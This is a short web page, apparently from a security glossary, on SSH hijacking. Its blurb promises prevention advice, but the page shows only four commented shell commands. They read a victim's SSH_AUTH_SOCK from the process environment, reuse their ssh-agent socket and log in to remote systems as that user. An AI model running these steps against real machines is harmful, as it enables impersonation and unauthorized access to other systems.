SSH Hijacking

Dive deep into our comprehensive article that takes you through the intricacies of SSH Hijacking. Get the best prevention strategies and solutions for this cyber threat.

# Attacker finds the SSHd process of the victim
ps uax|grep sshd
# Attacker looks for the SSH_AUTH_SOCK on victim's environment variables
grep SSH_AUTH_SOCK /proc/<pid>/environ
# Attacker hijack's victim's ssh-agent socket
SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXXX/agent.XXXX ssh-add -l
# Attacker can login to remote systems as the victim
ssh remote_system -l vicitm

Last updated